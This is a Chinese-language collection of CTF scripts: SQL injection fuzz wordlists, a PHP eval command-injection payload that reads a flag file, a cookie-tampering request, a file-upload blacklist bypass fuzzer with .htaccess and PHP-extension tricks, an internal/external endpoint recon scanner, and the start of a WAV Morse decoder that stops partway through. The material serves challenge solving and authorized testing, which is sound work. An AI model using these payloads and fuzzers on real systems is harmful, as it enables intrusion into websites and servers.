6410 字
32 分钟
脚本积累
SQL注入:
fuzz字典:
与bp共同使用。
转义类字典:
'"`\;,()[]{}+-*/%=<>!^|&#----/**/%00%0a
单词字典:
AND
OR
NOT
XOR
UNION
SELECT
INSERT
UPDATE
DELETE
DROP
CREATE
ALTER
WHERE
FROM
LIMIT
ORDER
GROUP
BY
HAVING
SLEEP
BENCHMARK
EXTRACTVALUE
UPDATEXML
LOAD_FILE
INTO
OUTFILE
变形测试字典:
sEleCt
sel%00ect
union/**/select
/*!SELECT*/
+SELECT+
%53%45%4c%45%43%54
(select)
检测深层功能限制:
user()
database()
version()
@@version
@@datadir
char()
ascii()
substr()
substring()
count()
concat()
group_concat()
WEB绕过:
eval执行命令类的一:
import requests
# Target endpoint; replace with the challenge URL.
url = "url"

# Value carried in the `cmd` parameter.
params = {"cmd": "?><?=`. /???/p?p??????`;"}

# Content of the uploaded file: "#!/bin/sh" selects the shell, "\n" ends that
# line, and "cat /flag.txt" is the command that actually runs.
files = {"file": ("shell.sh", "#!/bin/sh\ncat /flag.txt")}
response = requests.post(url, params=params, files=files)
print(response.text)

WEB的POST:
import requests
url = "你的url"

# Request-specific header: the cookie value carries the quoted user "adm;n".
# (The original used a C-style `//` comment here, which Python parses as
# floor division and fails on at runtime.)
headers = {"Cookie": 'user="adm;n"'}

# A Session keeps any cookies the server sets so they can be inspected later.
session = requests.Session()
response = session.get(url, headers=headers)

print(f"状态码: {response.status_code}")
print(f"响应内容: {response.text}")
if "login success" in response.text:
    print("登录成功!当前 Session Cookie 为:")
    print(session.cookies.get_dict())

WEB文件上传的fuzz脚本:
import argparse
import json
import random
import re
import string
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set
from urllib.parse import urljoin

import requests
# Default filename mutations: common suffix tricks for bypassing extension
# blacklists.
DEFAULT_CASES = [
    "shell.php",
    "shell.phtml",
    "shell.php5",
    "shell.php7",
    "shell.PhP",
    "shell.php ",
    "shell.php.",
    "shell.php;.jpg",
    "shell.php%00.jpg",
    "shell.php.jpg",
    "shell.jpg.php",
    ".htaccess",
]
# Three kinds of upload content:
# 1) a plain image placeholder (for uploads disguised as images)
# 2) a PHP payload (to test whether the file gets executed)
# 3) an .htaccess rule (to test Apache configuration override)
IMAGE_PLACEHOLDER = (
    b"\x89PNG\r\n\x1a\n"
    b"\x00\x00\x00\rIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x02\x00\x00\x00\x90wS\xde"
    b"\x00\x00\x00\nIDATx\x9cc`\x00\x00\x00\x02\x00\x01\xe2!\xbc3"
    b"\x00\x00\x00\x00IEND\xaeB`\x82"
)
PHP_PAYLOAD = b"<?php echo 'upload_test_ok'; ?>"
HTACCESS_PAYLOAD = b"AddType application/x-httpd-php .png\n"
@dataclass
class CaseResult:
    """Aggregated outcome of a single upload test case."""

    # Filename that was submitted in the multipart upload.
    filename: str
    # HTTP status of the upload request, or None when the request failed.
    upload_status: Optional[int]
    # Heuristic flag: the upload response looked successful.
    upload_ok_hint: bool
    # Response body (or error text) associated with the upload.
    upload_message: str
    # One formatted line per follow-up probe of a candidate URL.
    probe_results: List[str]
def random_tag(length: int = 6) -> str:
    """Return a random lowercase-alphanumeric tag of ``length`` characters.

    The tag is used as a filename prefix so that repeated runs do not collide
    on the same uploaded name and pollute the results.
    """
    alphabet = string.ascii_lowercase + string.digits
    return "".join(random.choice(alphabet) for _ in range(length))
def normalize_base(base: str) -> str:
    """Normalize a base URL: add a scheme if missing and drop trailing slashes.

    Surrounding whitespace is removed first so that a padded argument does not
    end up embedded in the URL.
    """
    base = base.strip()
    if not base.startswith(("http://", "https://")):
        return "http://" + base.strip("/")
    return base.rstrip("/")
def detect_upload_field(session: requests.Session, upload_url: str, timeout: int) -> str:
    """Guess the multipart field name the upload endpoint expects.

    Each common field name is tried with a tiny text file. The first one whose
    response is below HTTP 500 and mentions neither "missing" nor "required"
    is returned. Falls back to ``"file"`` when none qualifies.
    """
    common_fields = ["file", "upload", "image", "avatar", "img", "files[]"]
    for field in common_fields:
        files = {field: ("field_probe.txt", b"probe", "text/plain")}
        try:
            r = session.post(upload_url, files=files, timeout=timeout)
        except requests.RequestException:
            # Network error for this attempt: move on to the next field name.
            continue
        text = (r.text or "").lower()
        if r.status_code < 500 and "missing" not in text and "required" not in text:
            return field
    return "file"
def read_wordlist(path: str) -> List[str]:
    """Read a custom filename wordlist, one entry per line.

    Blank lines and lines starting with ``#`` are skipped; each entry is
    stripped of surrounding whitespace. Undecodable bytes are ignored.
    """
    out: List[str] = []
    with open(path, "r", encoding="utf-8", errors="ignore") as f:
        for raw in f:
            name = raw.strip()
            if not name or name.startswith("#"):
                continue
            out.append(name)
    return out
def looks_like_success(status_code: Optional[int], text: str) -> bool:
    """Roughly decide whether an upload response looks successful.

    Any 2xx status counts as success. Otherwise the body is searched
    case-insensitively for success keywords. "ok" must appear as a standalone
    token, so words such as "token" or "cookie" no longer trigger a hit.
    """
    import re  # local import keeps this block usable on its own

    if status_code is not None and 200 <= status_code < 300:
        return True

    low = text.lower()
    if any(w in low for w in ("success", "上传成功", "done", "saved")):
        return True
    return re.search(r"(?<![a-z0-9])ok(?![a-z0-9])", low) is not None
def looks_like_exists(status_code: int) -> bool:
    """Return True for statuses that usually mean the resource exists or is reachable.

    403 is included on purpose: access denied still implies something is there.
    """
    return status_code in (200, 301, 302, 401, 403)
def collect_strings(obj) -> Iterable[str]:
    """Recursively yield every string found in a decoded JSON value.

    String dict keys are yielded before their values. Non-string scalars are
    ignored. Used to harvest possible file paths from an API response.
    """
    if isinstance(obj, dict):
        for k, v in obj.items():
            if isinstance(k, str):
                yield k
            yield from collect_strings(v)
    elif isinstance(obj, list):
        for item in obj:
            yield from collect_strings(item)
    elif isinstance(obj, str):
        yield obj
def extract_candidates_from_response(base: str, upload_dir: str, filename: str, body: str) -> List[str]:
    """Extract URLs from an upload response that may point at the uploaded file.

    Sources, in order: absolute URLs in the raw body, path-like strings inside
    a JSON body, ``/path`` fragments in the raw body that mention "upload" or
    the filename, and finally the fallback ``<upload_dir>/<filename>``.

    Returns the de-duplicated candidates sorted alphabetically.
    """
    candidates: Set[str] = set()
    root = base + "/"

    # 1) Absolute URLs that appear verbatim in the body.
    for m in re.findall(r"https?://[^\s\"'<>]+", body):
        candidates.add(m.strip())

    # 2) If the body is JSON, walk every string in it for path hints.
    try:
        parsed_json = json.loads(body)
    except (ValueError, RecursionError):
        parsed_json = None

    if parsed_json is not None:
        for token in collect_strings(parsed_json):
            t = token.strip().strip("\"'")
            if not t:
                continue
            if t.startswith(("http://", "https://")):
                candidates.add(t)
            elif "/" in t or "." in t:
                # Covers both "/abs/path" and relative "dir/name.ext" forms.
                candidates.add(urljoin(root, t.lstrip("/")))

    # 3) "/xxx"-shaped fragments in the raw text that mention upload or the filename.
    for m in re.findall(r"(/[^\"'\s<>]+)", body):
        if "upload" in m.lower() or filename in m:
            candidates.add(urljoin(root, m.lstrip("/")))

    # 4) Fallback: <upload_dir>/<filename>.
    upload_dir = upload_dir.strip("/")
    candidates.add(urljoin(root, f"{upload_dir}/{filename}"))
    return sorted(candidates)
def build_payload(filename: str) -> bytes:
    """Pick the upload body that matches the filename.

    ``.htaccess`` gets the Apache rule, names ending in a PHP-style extension
    get the PHP payload, and everything else gets the image placeholder.
    The comparison is case-insensitive.
    """
    name_l = filename.lower()
    if name_l == ".htaccess":
        return HTACCESS_PAYLOAD
    if name_l.endswith((".php", ".phtml", ".php5", ".php7", ".phar")):
        return PHP_PAYLOAD
    return IMAGE_PLACEHOLDER
def guess_content_type(filename: str) -> str:
    """Guess a Content-Type from the filename suffix (case-insensitive).

    Makes the multipart upload resemble a real client. Unknown suffixes fall
    back to ``image/png``.
    """
    name_l = filename.lower()
    if name_l == ".htaccess":
        return "text/plain"
    if name_l.endswith((".php", ".phtml", ".php5", ".php7", ".phar")):
        return "application/x-httpd-php"
    if name_l.endswith((".jpg", ".jpeg")):
        return "image/jpeg"
    if name_l.endswith(".gif"):
        return "image/gif"
    return "image/png"
def probe_urls(session: requests.Session, urls: List[str], timeout: int) -> List[str]:
    """Request each candidate URL and report whether the file may exist.

    Redirects are not followed. Returns one formatted line per URL, in input
    order: ``[EXISTS?]`` or ``[MISS]`` with the status code, or ``[ERR ]``
    with the exception text when the request fails.
    """
    results: List[str] = []
    for u in urls:
        try:
            r = session.get(u, timeout=timeout, allow_redirects=False)
        except requests.RequestException as e:
            results.append(f"[ERR ] --- {u} ({e})")
            continue
        marker = "EXISTS?" if looks_like_exists(r.status_code) else "MISS"
        results.append(f"[{marker}] {r.status_code:3d} {u}")
    return results
def infer_followup_advice(result: CaseResult) -> List[str]:
    """Suggest next verification steps for one test case.

    Looks at the upload response text and the probe lines of ``result`` and
    returns at most three tips. The tips are risk assessments and verification
    suggestions only; they contain no exploitation details.
    """
    tips: List[str] = []
    msg = result.upload_message
    msg_low = msg.lower()
    name_low = result.filename.lower()
    exists_lines = [x for x in result.probe_results if "[EXISTS?]" in x]
    has_403 = any(" 403 " in x for x in exists_lines)

    # Typical "type rejected" messages.
    if any(k in msg for k in ["非法类型", "类型不允许"]) or any(
        k in msg_low for k in ["invalid type", "forbidden type", "not allowed"]
    ):
        tips.append("类型黑名单命中:当前变体被拦截,建议继续记录被拦截后缀与MIME组合,反向推断过滤规则。")

    # .htaccess: a 403 usually means the file exists but access is restricted.
    if name_low == ".htaccess" and exists_lines:
        if has_403:
            tips.append(".htaccess 回访为 403:大概率已落盘且受访问控制,优先核查上传目录配置与解析策略。")
        else:
            tips.append(".htaccess 可访问:上传目录配置风险较高,建议立即复核服务器限制策略。")

    # Dangerous extensions (risk notice only).
    dangerous_exts = [".php", ".phtml", ".php5", ".php7", ".phar"]
    if name_low.endswith(tuple(dangerous_exts)) and exists_lines:
        tips.append("危险扩展疑似可访问:风险级别高,建议在授权环境按应急流程进行隔离、取证与修复。")

    # Hint that the server renamed the upload to an image extension.
    if any(ext in msg_low for ext in [".png", ".jpg", ".jpeg", ".gif"]) and any(
        ext in name_low for ext in dangerous_exts
    ):
        tips.append("服务端可能强制重命名为图片扩展:可继续验证最终保存名、存储目录和解析链是否一致。")

    if not tips:
        tips.append("回显信息不足:建议补充记录最终文件名、访问状态码、响应头和静态文件服务器行为。")
    return tips[:3]
def run_case(
    session: requests.Session,
    base: str,
    upload_url: str,
    upload_dir: str,
    field_name: str,
    timeout: int,
    filename: str,
) -> CaseResult:
    """Run one test case: upload, parse the response, probe candidate URLs.

    A failed upload request is not raised; its error text becomes the
    response text and ``upload_status`` stays ``None``.
    """
    payload = build_payload(filename)
    ctype = guess_content_type(filename)
    files = {field_name: (filename, payload, ctype)}

    upload_status: Optional[int] = None
    upload_text = ""
    try:
        r = session.post(upload_url, files=files, timeout=timeout)
        upload_status = r.status_code
        upload_text = (r.text or "").strip()
    except requests.RequestException as e:
        upload_text = str(e)

    upload_hint = looks_like_success(upload_status, upload_text)

    candidates = extract_candidates_from_response(
        base,
        upload_dir,
        filename,
        upload_text,
    )
    # Cap the candidates BEFORE probing: the reported lines are the same as
    # truncating afterwards, but no requests are spent on discarded URLs.
    probes = probe_urls(session, candidates[:12], timeout=timeout)

    # Short single-line excerpt of the response for display.
    msg = upload_text[:180].replace("\n", "\\n")
    return CaseResult(
        filename=filename,
        upload_status=upload_status,
        upload_ok_hint=upload_hint,
        upload_message=msg,
        probe_results=probes,
    )
def main() -> None:
    """CLI entry point: batch-test upload blacklist bypass cases.

    For authorized testing only. Parses the arguments, builds the filename
    list, runs every case and prints a per-case report plus a final summary.
    """
    parser = argparse.ArgumentParser(
        description="Generic upload blacklist bypass fuzzer (authorized testing only)."
    )
    parser.add_argument("--base", required=True, help="Target base URL, e.g. http://127.0.0.1")
    parser.add_argument("--upload-path", default="/upload.php", help="Upload endpoint path")
    parser.add_argument("--upload-dir", default="/uploads", help="Public upload directory")
    parser.add_argument("--field", default="", help="Multipart field name, auto-detect if empty")
    parser.add_argument("--wordlist", default="", help="Custom filename list (one per line)")
    parser.add_argument("--timeout", type=int, default=10, help="HTTP timeout seconds")
    parser.add_argument("--prefix", default="", help="Optional filename prefix")
    parser.add_argument("--random-tag", action="store_true", help="Prepend random tag to non-.htaccess names")
    args = parser.parse_args()

    base = normalize_base(args.base)
    upload_url = urljoin(base + "/", args.upload_path.lstrip("/"))

    # Filename source: a custom wordlist wins, otherwise the built-in set.
    if args.wordlist:
        filenames = read_wordlist(args.wordlist)
    else:
        filenames = DEFAULT_CASES.copy()

    # Optional prefix: fixed or random, never both. ".htaccess" is never
    # prefixed.
    if args.prefix:
        filenames = [f"{args.prefix}{name}" if name != ".htaccess" else name for name in filenames]
    elif args.random_tag:
        tag = random_tag()
        filenames = [f"{tag}_{name}" if name != ".htaccess" else name for name in filenames]

    session = requests.Session()
    # Auto-detect the upload field name unless one was given explicitly.
    field_name = args.field.strip() or detect_upload_field(session, upload_url, timeout=args.timeout)

    print(f"[+] base : {base}")
    print(f"[+] upload_url : {upload_url}")
    print(f"[+] upload_dir : {args.upload_dir}")
    print(f"[+] field : {field_name}")
    print(f"[+] test_count : {len(filenames)}")
    print()

    hits = 0
    for idx, name in enumerate(filenames, start=1):
        result = run_case(
            session=session,
            base=base,
            upload_url=upload_url,
            upload_dir=args.upload_dir,
            field_name=field_name,
            timeout=args.timeout,
            filename=name,
        )
        status_str = str(result.upload_status) if result.upload_status is not None else "---"
        yesno = "Y" if result.upload_ok_hint else "N"
        print(f"[{idx:02d}] {result.filename}")
        print(f" upload_status={status_str} success_hint={yesno}")
        print(f" resp={result.upload_message}")
        for line in result.probe_results:
            print(f" {line}")
        for tip in infer_followup_advice(result):
            print(f" [advice] {tip}")
        # A case counts as a hit when any candidate URL is marked EXISTS?.
        if any("EXISTS?" in x for x in result.probe_results):
            hits += 1
        print()

    print(f"[+] done. cases_with_possible_uploaded_file={hits}/{len(filenames)}")
    print("[*] Note: 403 on /uploads/.htaccess usually indicates file exists but directory listing/access is denied.")
if __name__ == "__main__":
    main()

# 用法:python fuzz_upload_blacklist.py --base "http://目标地址" --upload-path "/upload.php" --upload-dir "/uploads"

WEB扫描内外网脚本:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""授权安全测试用:内网/外网接口通用扫描脚本(偏侦察,不含利用逻辑)

功能概览:
1) 扫描外网基址 +(可选)内网基址上的接口可达性
2) 记录状态码、耗时、关键响应头与响应摘要
3) 对比同一路径在外网/内网的差异,辅助发现 ACL 配置风险
4) 结果保存为 JSON,便于后续复盘
"""
import argparse
import json
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from dataclasses import asdict, dataclass
from typing import Dict, Iterable, List, Optional, Tuple
from urllib.parse import urljoin, urlparse

import requests
# Default path wordlist: common external endpoints plus internal-looking
# prefixes frequently seen in challenges.
DEFAULT_PATHS = [
    "/",
    "/robots.txt",
    "/api/info",
    "/api/health",
    "/api/status",
    "/api/sandbox/execute",
    "/internal/admin",
    "/internal/config",
    "/internal/secret-fragment",
]
@dataclass
class ProbeResult:
    """One probe outcome; plain fields so it converts directly to JSON."""

    # "external" or "internal".
    scope: str
    # Upper-cased HTTP method.
    method: str
    # Requested path and the full URL it resolved to.
    path: str
    url: str
    # HTTP status, or None when the request failed.
    status_code: Optional[int]
    # Wall-clock duration of the request in milliseconds.
    elapsed_ms: int
    # Response body length in bytes and a short escaped excerpt.
    body_size: int
    body_preview: str
    # Values of the Server and X-Parser response headers ("" if absent).
    server: str
    x_parser: str
    # Short risk label derived from the result.
    hint: str
    # Exception text when the request failed, otherwise "".
    error: str
def normalize_base(base: str) -> str:
    """Normalize a base URL: trim whitespace, add a scheme, drop trailing slashes.

    Returns ``""`` for blank input so callers can treat it as "not provided".
    """
    base = base.strip()
    if not base:
        return ""
    if not base.startswith(("http://", "https://")):
        base = "http://" + base
    return base.rstrip("/")
def parse_headers(header_items: Optional[List[str]]) -> Dict[str, str]:
    """Parse repeated ``--header "K: V"`` values into a dict.

    Each item is split on its first colon. Items without a colon or with an
    empty name are skipped. A later duplicate name overwrites an earlier one.
    """
    headers: Dict[str, str] = {}
    if not header_items:
        return headers
    for item in header_items:
        if ":" not in item:
            continue
        k, v = item.split(":", 1)
        k = k.strip()
        if k:
            headers[k] = v.strip()
    return headers
def read_paths_file(path: str) -> List[str]:
    """Read a path wordlist, one path per line.

    Blank lines and ``#`` comment lines are skipped. Entries that lack a
    leading ``/`` get one prepended.
    """
    out: List[str] = []
    with open(path, "r", encoding="utf-8", errors="ignore") as f:
        for raw in f:
            line = raw.strip()
            if not line or line.startswith("#"):
                continue
            if not line.startswith("/"):
                line = "/" + line
            out.append(line)
    return out
def dedupe_keep_order(items: Iterable[str]) -> List[str]:
    """Remove duplicates while keeping first-seen order."""
    # dict preserves insertion order, so its keys are the ordered unique items.
    return list(dict.fromkeys(items))
def safe_preview(text: str, limit: int = 100) -> str:
    """Return a single-line excerpt of a response body.

    CR and LF are replaced by their escaped forms before the result is cut to
    ``limit`` characters, so the limit applies to the escaped text.
    """
    if not text:
        return ""
    return text.replace("\r", "\\r").replace("\n", "\\n")[:limit]
def infer_hint(scope: str, path: str, status_code: Optional[int], x_parser: str) -> str:
    """Derive a short risk label for one probe result.

    The labels are risk markers only. Several markers may apply and are then
    joined with a full-width semicolon. When none applies, the status code
    alone decides the label.
    """
    if status_code is None:
        return "请求失败"

    hints: List[str] = []
    if path.startswith("/internal/") and scope == "external" and status_code in (200, 401, 403):
        hints.append("外网疑似可见内网接口")
    if status_code in (401, 403):
        hints.append("接口存在但受限")
    if x_parser:
        hints.append("发现X-Parser响应头")

    if hints:
        return ";".join(hints)
    if 200 <= status_code < 300:
        return "可达"
    if status_code == 404:
        return "未发现"
    return "需人工复核"
def probe_once(
    session: requests.Session,
    scope: str,
    base: str,
    path: str,
    method: str,
    timeout: int,
    verify_tls: bool,
    headers: Dict[str, str],
    post_json: str,
) -> ProbeResult:
    """Send one request and collect its metadata.

    POST sends ``post_json`` UTF-8 encoded as the body; other methods send no
    body. Redirects are not followed. A ``requests.RequestException`` is
    recorded in ``error`` instead of being raised, and ``status_code`` then
    stays ``None``.
    """
    url = urljoin(base + "/", path.lstrip("/"))
    method_u = method.upper()
    body_preview = ""
    server = ""
    x_parser = ""
    error = ""
    status_code: Optional[int] = None
    body_size = 0

    started = time.perf_counter()
    try:
        if method_u == "POST":
            r = session.post(
                url,
                data=post_json.encode("utf-8"),
                headers=headers,
                timeout=timeout,
                verify=verify_tls,
                allow_redirects=False,
            )
        else:
            r = session.request(
                method_u,
                url,
                headers=headers,
                timeout=timeout,
                verify=verify_tls,
                allow_redirects=False,
            )
        status_code = r.status_code
        body_size = len(r.content or b"")
        body_preview = safe_preview(r.text or "")
        server = r.headers.get("Server", "")
        x_parser = r.headers.get("X-Parser", "")
    except requests.RequestException as exc:
        error = str(exc)
    # Elapsed time is measured for failed requests too.
    elapsed_ms = int((time.perf_counter() - started) * 1000)

    hint = infer_hint(scope=scope, path=path, status_code=status_code, x_parser=x_parser)
    return ProbeResult(
        scope=scope,
        method=method_u,
        path=path,
        url=url,
        status_code=status_code,
        elapsed_ms=elapsed_ms,
        body_size=body_size,
        body_preview=body_preview,
        server=server,
        x_parser=x_parser,
        hint=hint,
        error=error,
    )
def diff_external_internal(results: List[ProbeResult]) -> List[Dict[str, object]]:
    """List the (method, path) pairs whose status differs between scopes.

    Only pairs that have both an "external" and an "internal" result are
    compared. Each entry carries both status codes and both hints.
    """
    table: Dict[Tuple[str, str], Dict[str, ProbeResult]] = {}
    for r in results:
        table.setdefault((r.method, r.path), {})[r.scope] = r

    diffs: List[Dict[str, object]] = []
    for (method, path), pair in table.items():
        ext = pair.get("external")
        inn = pair.get("internal")
        if ext is None or inn is None:
            continue
        if ext.status_code != inn.status_code:
            diffs.append(
                {
                    "method": method,
                    "path": path,
                    "external_status": ext.status_code,
                    "internal_status": inn.status_code,
                    "external_hint": ext.hint,
                    "internal_hint": inn.hint,
                }
            )
    return diffs
def print_result_line(r: ProbeResult) -> None:
    """Print one probe result as a single fixed-layout line for quick scanning.

    The status is shown as ``---`` when the request failed. The X-Parser
    value and the error text are appended only when present.
    """
    code = "---" if r.status_code is None else f"{r.status_code:3d}"
    err = f" err={r.error}" if r.error else ""
    parser_text = f" X-Parser={r.x_parser}" if r.x_parser else ""
    print(
        f"[{r.scope:8s}] [{r.method:7s}] {code} "
        f"{r.elapsed_ms:4d}ms {r.body_size:5d}B {r.path} | {r.hint}{parser_text}{err}"
    )
def main() -> None:
    """CLI entry point of the internal/external surface scanner (recon only).

    Probes every path/method combination against the external base and, when
    given, the internal base; prints each result as it completes; writes all
    results plus the external/internal status differences to a JSON file.
    """
    parser = argparse.ArgumentParser(
        description="Authorized internal/external surface scanner (recon only)."
    )
    parser.add_argument("--external-base", required=True, help="外网基址,如 http://target.com")
    parser.add_argument("--internal-base", default="", help="内网基址(可选),如 http://127.0.0.1:8080")
    parser.add_argument("--paths-file", default="", help="路径词典文件(每行一个路径)")
    parser.add_argument("--add-path", action="append", default=[], help="追加单个路径,可多次传入")
    parser.add_argument("--method", action="append", default=[], help="HTTP 方法,可重复,如 --method GET --method POST")
    parser.add_argument("--post-json", default="{}", help="POST 请求体(字符串)")
    parser.add_argument("--header", action="append", default=[], help='自定义请求头,如 --header "Authorization: Bearer xxx"')
    parser.add_argument("--timeout", type=int, default=8, help="请求超时(秒)")
    parser.add_argument("--threads", type=int, default=8, help="并发数")
    parser.add_argument("--insecure", action="store_true", help="忽略 TLS 证书校验")
    parser.add_argument("--output", default="surface_scan_result.json", help="结果 JSON 输出路径")
    args = parser.parse_args()

    external_base = normalize_base(args.external_base)
    internal_base = normalize_base(args.internal_base) if args.internal_base else ""
    methods = dedupe_keep_order(m.upper() for m in (args.method or ["GET"]))

    # Paths: the wordlist file wins over the built-in list; --add-path entries
    # are appended afterwards.
    if args.paths_file:
        paths = read_paths_file(args.paths_file)
    else:
        paths = DEFAULT_PATHS.copy()
    for p in args.add_path:
        p = p.strip()
        if not p:
            continue
        if not p.startswith("/"):
            p = "/" + p
        paths.append(p)
    paths = dedupe_keep_order(paths)

    headers = parse_headers(args.header)
    verify_tls = not args.insecure

    print(f"[+] external_base : {external_base}")
    print(f"[+] internal_base : {internal_base or '(未提供)'}")
    print(f"[+] methods : {', '.join(methods)}")
    print(f"[+] path_count : {len(paths)}")
    print(f"[+] threads : {args.threads}")
    print()

    # One task per (scope, base, path, method). Plain tuples replace the
    # earlier "path::method" string packing.
    tasks: List[Tuple[str, str, str, str]] = []
    for path in paths:
        for method in methods:
            tasks.append(("external", external_base, path, method))
            if internal_base:
                tasks.append(("internal", internal_base, path, method))

    all_results: List[ProbeResult] = []
    session = requests.Session()
    with ThreadPoolExecutor(max_workers=max(1, args.threads)) as pool:
        futures = [
            pool.submit(
                probe_once,
                session,
                scope,
                base,
                path,
                method,
                args.timeout,
                verify_tls,
                headers,
                args.post_json,
            )
            for scope, base, path, method in tasks
        ]
        for fut in as_completed(futures):
            r = fut.result()
            all_results.append(r)
            print_result_line(r)

    # Sort so the exported file is stable across runs.
    all_results.sort(key=lambda x: (x.scope, x.path, x.method))
    diffs = diff_external_internal(all_results)

    out_obj = {
        "meta": {
            "external_base": external_base,
            "internal_base": internal_base,
            "methods": methods,
            "path_count": len(paths),
            "result_count": len(all_results),
        },
        "results": [asdict(r) for r in all_results],
        "external_internal_diff": diffs,
    }
    with open(args.output, "w", encoding="utf-8") as f:
        json.dump(out_obj, f, ensure_ascii=False, indent=2)

    ext_hits = sum(1 for r in all_results if r.scope == "external" and r.status_code in (200, 401, 403))
    int_hits = sum(1 for r in all_results if r.scope == "internal" and r.status_code in (200, 401, 403))
    print()
    print(f"[+] 扫描完成:共 {len(all_results)} 条结果")
    print(f"[+] external 可见接口(200/401/403):{ext_hits}")
    if internal_base:
        print(f"[+] internal 可见接口(200/401/403):{int_hits}")
    print(f"[+] 外内网差异项:{len(diffs)}")
    print(f"[+] JSON 输出:{args.output}")


if __name__ == "__main__":
    main()
# =========================
# 中文用法示例(授权测试)
# =========================
# 1) 仅扫外网(默认 GET + 内置路径词典)
# python generic_surface_scan.py --external-base "http://target.com"
#
# 2) 同时扫外网/内网并对比差异
# python generic_surface_scan.py --external-base "http://target.com" --internal-base "http://127.0.0.1:8080"
#
# 常见内网目标速查(仅限授权测试):
# - 常见内网网段(RFC1918):10.0.0.0/8、172.16.0.0/12、192.168.0.0/16
# - 常见本机/链路地址:127.0.0.1(回环)、169.254.0.0/16(链路本地)
# - 常见 Web 端口:80、443、8080、8443、8000、3000、5000、8888、9000
# - 可尝试的 --internal-base 示例:
# http://127.0.0.1:80
# http://127.0.0.1:8080
# http://127.0.0.1:8000
# http://127.0.0.1:3000
# http://127.0.0.1:5000
# http://127.0.0.1:8888
# http://127.0.0.1:9000
# http://192.168.0.1:80
# http://192.168.1.1:8080
# http://10.0.0.1:80
# http://172.16.0.1:8080
#
# 3) 使用自定义路径词典 + GET/POST 双方法
# python generic_surface_scan.py --external-base "http://target.com" --paths-file "paths.txt" --method GET --method POST --post-json "{}"
#
# 4) 增加请求头并忽略证书校验(仅测试环境)
# python generic_surface_scan.py --external-base "https://target.com" --header "Authorization: Bearer test" --insecure
#
# 5) 指定输出文件
# python generic_surface_scan.py --external-base "http://target.com" --output "scan_out.json"

MISC莫斯密码和二进制密码分析:
#!/usr/bin/env python3
"""Decode hidden pulse messages from WAV audio.

Supported decoding paths:
1) Morse code (dot / dash timing)
2) Binary pulse stream (on=1 / off=0)

Usage examples:
    python generic_surface_scan.py sample.wav
    python generic_surface_scan.py sample.wav --mode morse
    python generic_surface_scan.py sample.wav --mode binary --json-out result.json
"""
from __future__ import annotations
import argparse
import json
import math
import statistics
import struct
import wave
from dataclasses import asdict, dataclass, field
from pathlib import Path
from typing import Dict, List, Sequence, Tuple

# A run is (state, duration_frames); state is 0 (silence) or 1 (tone).
Run = Tuple[int, int]

# Morse symbol -> character: letters, digits, then punctuation.
MORSE_TO_TEXT: Dict[str, str] = {
    # Letters
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E",
    "..-.": "F", "--.": "G", "....": "H", "..": "I", ".---": "J",
    "-.-": "K", ".-..": "L", "--": "M", "-.": "N", "---": "O",
    ".--.": "P", "--.-": "Q", ".-.": "R", "...": "S", "-": "T",
    "..-": "U", "...-": "V", ".--": "W", "-..-": "X", "-.--": "Y",
    "--..": "Z",
    # Digits
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
    # Punctuation
    ".-.-.-": ".", "--..--": ",", "..--..": "?", ".----.": "'",
    "-.-.--": "!", "-..-.": "/", "-.--.": "(", "-.--.-": ")",
    ".-...": "&", "---...": ":", "-.-.-.": ";", "-...-": "=",
    ".-.-.": "+", "-....-": "-", "..--.-": "_", ".-..-.": '"',
    "...-..-": "$", ".--.-.": "@",
}
@dataclass
class SignalStats:
    """Summary figures describing the analysed audio signal."""

    sample_rate: int
    duration_sec: float
    # Length of one envelope frame in milliseconds and the number of frames.
    frame_ms: float
    frame_count: int
    # Envelope level separating "on" frames from "off" frames.
    threshold: float
    # Number of on/off runs, and the fraction of frames that are "on".
    run_count: int
    active_ratio: float
@dataclass
class MorseResult:
    """Outcome of the Morse decoding path; all fields default to "empty"."""

    # Estimated dot length in envelope frames.
    dot_unit_frames: int = 0
    # Number of Morse symbols found and how many were not in the table.
    symbol_count: int = 0
    unknown_count: int = 0
    # Share of symbols that decoded to a known character.
    known_ratio: float = 0.0
    # Raw dot/dash tokens and the decoded text.
    morse_symbols: str = ""
    decoded_text: str = ""
@dataclass
class BinaryCandidate:
    """One candidate decoding of the binary pulse stream."""

    # "msb" or "lsb": bit order used inside each byte.
    bit_order: str
    # Number of leading bits skipped before grouping into bytes.
    offset_bits: int
    # Text encoding used to decode the bytes.
    encoding: str
    # Text-quality score of the decoded text.
    score: float
    text: str
    # Number of bytes that were decoded.
    byte_length: int
@dataclass
class BinaryResult:
    """Outcome of the binary decoding path; all fields default to "empty"."""

    # Estimated bit length in envelope frames.
    bit_unit_frames: int = 0
    # Length of the reconstructed bitstream and a short excerpt of it.
    bitstream_length: int = 0
    bitstream_preview: str = ""
    # Fields copied from the best-scoring candidate.
    best_text: str = ""
    best_score: float = 0.0
    best_bit_order: str = ""
    best_offset_bits: int = 0
    best_encoding: str = ""
    # Top candidates, best first; a fresh list per instance.
    candidates: List[BinaryCandidate] = field(default_factory=list)
def percentile(values: Sequence[float], p: float) -> float:
    """Return the nearest-rank percentile of ``values`` for ``p`` in [0, 1].

    Returns 0.0 for empty input, the minimum for ``p <= 0`` and the maximum
    for ``p >= 1``. No interpolation is done: the element at the rounded
    index of the sorted values is returned.
    """
    if not values:
        return 0.0
    if p <= 0:
        return float(min(values))
    if p >= 1:
        return float(max(values))
    arr = sorted(float(v) for v in values)
    idx = int(round((len(arr) - 1) * p))
    return arr[idx]
def safe_text_preview(text: str, limit: int = 200) -> str:
    """Return ``text`` on one line (CR/LF escaped), cut to ``limit`` characters."""
    return text.replace("\r", "\\r").replace("\n", "\\n")[:limit]
def load_wav_mono(path: Path) -> Tuple[List[float], int]:
    """Load a PCM WAV file as peak-normalized mono samples.

    Supports 1-, 2-, 3- and 4-byte samples. Multi-channel audio is averaged
    per frame. A trailing partial sample or frame, as found in a truncated
    file, is dropped instead of raising ``struct.error``.

    Returns:
        ``(samples, sample_rate)`` with samples scaled so the peak magnitude
        is 1.0, or all zeros for a silent file.

    Raises:
        ValueError: invalid channel count or unsupported sample width.
    """
    with wave.open(str(path), "rb") as wf:
        channels = wf.getnchannels()
        sample_width = wf.getsampwidth()
        sample_rate = wf.getframerate()
